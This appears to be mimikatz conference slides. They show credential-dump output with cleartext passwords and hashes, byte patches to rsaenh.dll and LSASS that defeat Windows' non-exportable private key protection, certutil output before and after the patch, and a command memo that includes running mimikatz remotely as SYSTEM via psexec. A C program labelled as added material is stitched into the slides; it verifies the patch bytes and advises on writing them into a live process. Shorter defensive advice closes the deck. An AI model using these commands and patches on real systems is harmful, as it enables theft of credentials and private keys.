  mimikatz # sekurlsa::logonPasswords full

  Authentication Id         : 0;234870
  Authentication package    : NTLM
  Primary user              : Gentil Kiwi
  Authentication domain     : vm-w8-rp-x

          msv1_0 :
           * User      : Gentil Kiwi
           * Domain    : vm-w8-rp-x
           * LM hash   : d0e9aee149655a6075e4540af1f22d3b
           * NTLM hash : cc36cf7a8514893efccd332446158b1a
          kerberos :
           * User      : Gentil Kiwi
           * Domain    : vm-w8-rp-x
           * Password  : waza1234/
          wdigest :
           * User      : Gentil Kiwi
           * Domain    : vm-w8-rp-x
           * Password  : waza1234/
          tspkg :
           * User      : Gentil Kiwi
           * Domain    : vm-w8-rp-x
           * Password  : waza1234/
          livessp :
           n.t. (LUID KO)

mimikatz :: sekurlsa - what can we do?

Basics
- No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
- No admin rights / system rights / debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke; so useless!!!)
- For privileged accounts, network logon instead of interactive (when possible)
- Audit; pass-the-hash leaves traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token): $ /
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  - biometrics (it keeps the password somewhere and pushes it to Windows)
  - single sign on
- Stop shared secrets for authentication: push public/private stuff (like keys ;))
- Take opportunities to drop backward compatibility
- Disable faulty providers?
  - Is it supported by Microsoft?
  - Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?

mimikatz :: crypto - what is it?

A little module that I wrote to:
- play with the Windows Cryptographic API / CNG and RSA keys
- automate the export of certificates/keys
  - even those which are "not" exportable

What the crypto module can do:
- List: providers, stores, certificates, keys
- Export
  - Certificates: public part in DER format, with private keys in PFX format
  - Private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch
  - CryptoAPI in the mimikatz context
  - CNG in the LSASS context (again!)

(module: mod_mimikatz_crypto)

mimikatz :: crypto - how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  - at least not without the master keys and/or the users' passwords
- Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
  - Yes, a computer/server opens a "session" too

Export/Usage can be limited by:
- Password (a constraint for most users)
- Popup (unavailable for computer keys)
- Export/Archive flag not present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

mimikatz :: crypto :: capi - how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...
- Processes deal with cryptographic keys through this API...

mimikatz :: crypto :: capi - how it's exported (Playskool level)

[Diagram: the process asks CryptoAPI and the RSA CSP to export a key; the CSP loads the private key (DPAPI decode), then checks "Exportable?": yes -> exported key; no -> NTE_BAD_KEY_STATE]
mimikatz :: crypto :: patchcapi - because I own my process

When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey
- This function does all the work to prepare the export, and checks whether the key is exportable

  mimikatz # crypto::exportCertificates
  Location: 'CERT_SYSTEM_STORE_CURRENT_USER'\My
          - Benjamin Delpy
                  Key container  : {470ADFBA-8718-4014-B05E-B30776B75A03}
                  Provider       : Microsoft Enhanced Cryptographic Provider v1.0
                  Type           : AT_KEYEXCHANGE
                  Exportability  : NO
                  Key size       : 2048
                  Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
                          (0x8009000b) Key not valid for use in specified state.
                  Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificate 0 ================
  Serial number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Not a root certificate
  Cert hash (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key container = {470ADFBA-8718-4014-B05E-B30776B75A03}
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  The private key CANNOT be exported
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

Exportable? Both mimikatz and certutil -exportPFX refuse with NTE_BAD_KEY_STATE (0x8009000b)

mimikatz :: crypto :: patchcapi - because I own my process

So what? A module in my own process tells me I can't do something?
CryptoAPI is in my memory space, let's patch it!

  .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
becomes
  .text:0AC0B7CB 90                   nop
  .text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive

  .text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
becomes
  .text:0AC1F749 90                   nop
  .text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare

I wrote "4" bytes in my memory space (2 per site: 0F 85 -> 90 E9; the rel32 displacement stays as it is, because the jmp starts one byte later and is one byte shorter than the jnz)

mimikatz :: crypto :: patchcapi - demo time!

Import, export, import as not exportable... export

mimikatz :: crypto :: patchcapi - limitations

Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys in real-life use
- Elliptic Curve a little...

mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll

mimikatz :: crypto :: cng - how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

- This time, key operations are not made in the "user" process context
  - The process uses RPC to call "Key Isolation service" (keyiso) functions
- It seems more secure than CryptoAPI...
- It is, but it's not perfect...

mimikatz :: crypto :: cng
how it's exported (high level)

[Diagram: the user process asks CNG to export a key; the request goes over RPC to the KeyIso service, hosted in the LSASS process. There the private key is loaded (DPAPI decode) and its "Exportable?" flag is checked: yes, the exported key goes back to the process; no, the caller gets NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process at ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP and SYSTEM_MANDATORY_LABEL_NO_READ_UP.]
mimikatz :: crypto :: patchcng
because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
 - This function does all the work to prepare the export, and checks whether the key is exportable

mimikatz # crypto::exportKeys
[user] CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
     Exportability : NO
     Key size      : 2048
     Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
     mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.

mimikatz :: crypto :: patchcng
because sometimes I own LSASS

This time, the checks and the keys are in the LSASS process…
And what?

I wrote "1" byte in LSASS memory space…

  .text:6C815210  75 1C    jnz   short continue_key_export
  .text:6C815210  EB 1C    jmp   short continue_key_export
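As an added example (not mimikatz code and not from the slides), the C program below applies the two rewrites shown for patchcapi and patchcng to constructed byte buffers and checks the one property that makes them safe: the taken-branch target must not move. A jnz rel32 (0F 85 disp32) is 6 bytes and a jmp rel32 (E9 disp32) is 5, so the disp32 is kept in place and a nop is put in front of it; that is why patchcapi writes 2 bytes per site, 4 bytes for the two rsaenh.dll checks. A jnz short (75 disp8) and a jmp short (EB disp8) are the same length, so patchcng writes 1 byte. The addresses and opcode bytes are the ones on the slides; the buffers and the function names (branch_target, patch_jnz32_to_jmp, patch_jnz8_to_jmp, patch_sites_demo) are assumptions made for this example. The real tool writes the bytes into rsaenh.dll loaded in its own process and into ncrypt inside the LSASS process; this example only touches a local copy, so it runs on any platform.

```c
/* Added example, not mimikatz source. Models the patchcapi / patchcng byte
 * rewrites on constructed buffers and verifies the branch target is kept.
 * Addresses and bytes come from the slides; buffers are constructed here. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Target of the branch at code[off] when code[0] lives at address `base`.
 * Handles jnz rel32 (0F 85), jmp rel32 (E9), jnz rel8 (75), jmp rel8 (EB).
 * Returns 0 for any other opcode. 32-bit addresses as on the x86 slides. */
uint32_t branch_target(const uint8_t *code, uint32_t base, size_t off)
{
    const uint8_t *p = code + off;
    int32_t rel32;
    if (p[0] == 0x0F && p[1] == 0x85) {              /* jnz rel32, 6 bytes */
        memcpy(&rel32, p + 2, sizeof rel32);
        return base + (uint32_t)off + 6 + (uint32_t)rel32;
    }
    if (p[0] == 0xE9) {                               /* jmp rel32, 5 bytes */
        memcpy(&rel32, p + 1, sizeof rel32);
        return base + (uint32_t)off + 5 + (uint32_t)rel32;
    }
    if (p[0] == 0x75 || p[0] == 0xEB)                 /* jnz/jmp rel8, 2 bytes */
        return base + (uint32_t)off + 2 + (uint32_t)(int32_t)(int8_t)p[1];
    return 0;
}

/* patchcapi: "0F 85 disp32" -> "90 E9 disp32". jmp rel32 is one byte
 * shorter than jnz rel32, so the nop pads the site back to 6 bytes and the
 * existing disp32, now measured from one byte later, still reaches
 * continue_key_export_or_archive. Returns bytes written (2) or 0. */
size_t patch_jnz32_to_jmp(uint8_t *code, size_t off)
{
    if (code[off] != 0x0F || code[off + 1] != 0x85)
        return 0;
    code[off] = 0x90;      /* nop */
    code[off + 1] = 0xE9;  /* jmp rel32, reuses the disp32 that follows */
    return 2;
}

/* patchcng: "75 disp8" -> "EB disp8", same length, 1 byte written. */
size_t patch_jnz8_to_jmp(uint8_t *code, size_t off)
{
    if (code[off] != 0x75)
        return 0;
    code[off] = 0xEB;      /* jmp short */
    return 1;
}

/* Patch a private copy of one site and confirm the taken-branch target is
 * identical before and after. Returns bytes written, or 0 on any mismatch.
 * After the rel32 rewrite the jmp starts one byte after the original jnz. */
static size_t patch_site(const uint8_t *site, size_t len, uint32_t base,
                         size_t (*patch)(uint8_t *, size_t))
{
    uint8_t copy[8];
    if (len > sizeof copy)
        return 0;
    memcpy(copy, site, len);
    uint32_t before = branch_target(copy, base, 0);
    size_t n = patch(copy, 0);
    if (n == 0 || before == 0)
        return 0;
    uint32_t after = branch_target(copy, base, n == 2 ? 1 : 0);
    if (before != after)
        return 0;
    if (patch(copy, 0) != 0)       /* second pass must refuse: opcode is gone */
        return 0;
    return n;
}

/* The three sites from the slides. Returns the total bytes written
 * (2 + 2 for patchcapi, 1 for patchcng = 5), or 0 if any check fails. */
size_t patch_sites_demo(void)
{
    static const uint8_t capi1[] = {0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF}; /* .text:0AC0B7CB */
    static const uint8_t capi2[] = {0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF}; /* .text:0AC1F749 */
    static const uint8_t cng1[]  = {0x75, 0x1C};                         /* .text:6C815210 */
    size_t a = patch_site(capi1, sizeof capi1, 0x0AC0B7CBu, patch_jnz32_to_jmp);
    size_t b = patch_site(capi2, sizeof capi2, 0x0AC1F749u, patch_jnz32_to_jmp);
    size_t c = patch_site(cng1, sizeof cng1, 0x6C815210u, patch_jnz8_to_jmp);
    if (!a || !b || !c)
        return 0;
    return a + b + c;
}

int main(void)
{
    uint8_t site[] = {0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF};   /* first rsaenh.dll site */
    printf("jnz target before: %08" PRIX32 "\n", branch_target(site, 0x0AC0B7CBu, 0));
    patch_jnz32_to_jmp(site, 0);
    printf("jmp target after : %08" PRIX32 "\n", branch_target(site, 0x0AC0B7CBu, 1));
    size_t total = patch_sites_demo();
    printf("bytes written across the three sites: %zu\n", total);
    return total == 5 ? 0 : 1;
}
```

Build with any C99 compiler. main prints the branch target of the first rsaenh.dll site before and after the rewrite (both 0AC07F04) and the byte count over the three sites. The same comparison is the check to run before writing into a live process: if branch_target differs after the rewrite, either the bytes or the offset are wrong and the patched code will land somewhere other than the "continue export" path.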

mimikatz :: crypto :: patchcng
demo time!

Import, export, import as not exportable… export again

mimikatz :: crypto :: patchcng
limitations

The patch operation needs some privileges:
 - Admin (debug privilege)
 - SYSTEM

mimikatz crypto::patchcng only deals with:
 - Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
 - certutil can…

mimikatz :: crypto :: patchcng
bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
 - until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
 - Yeah, like the good old one: certutil

Before patching LSASS:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After crypto::patchcng:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.

mimikatz :: crypto
memo

Some commands:

  mimikatz crypto::patchcapi crypto::exportCertificates exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password:
 - PFX files are protected by this password: mimikatz

Keys:
 - When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
 - When you delete a certificate, Windows does not delete its private key… funny, isn't it?
 - So yes, mimikatz can export it

mimikatz :: crypto
what can we do?

Exactly the same as for sekurlsa: prevent access to the accounts / the computer in the first place!
 - no admin, no admin, no admin…

Basics
 - Use smartcards/tokens for user certificates
 - Use Hardware Security Modules (HSM), even SoftHSM

More in depth
 - See what Microsoft can do with the TPM from Windows 8
 - Virtual SmartCard seems promising
 - Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
 - Their biometrics stuff was a little buggy ;)

mimikatz
what else can it do?

 - Play with minesweeper
 - Manipulate some handles
 - Pass the hash
 - Dump SAM / AD
 - Stop event monitoring
 - Patch Terminal Server
 - Basic GPO bypass
 - Applocker / SRP bypass
 - Driver
    - Play with tokens & privileges
    - Display SSDT x86 & x64
    - List minifilters actions
    - List Notifications (process / thread / image / registry)
    - List Objects hooks and procedures

mimikatz
that's all folks!

Thanks to / Merci à:
 - my girlfriend for her support (her LSASS crashed a few times)
 - Application Security Forum for offering me this great opportunity
 - Partners and Sponsors for sure!
 - Microsoft, for always considering it as normal/acceptable
 - Security friends/community for their ideas & challenges
    - nagual, newsoft, mubix, …
 - You, for your attention!

Questions?
 - Don't be shy ;)
 - especially if you have written the corresponding slide number

Blog, Source Code & Contact

blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz/
email     benjamin@gentilkiwi.com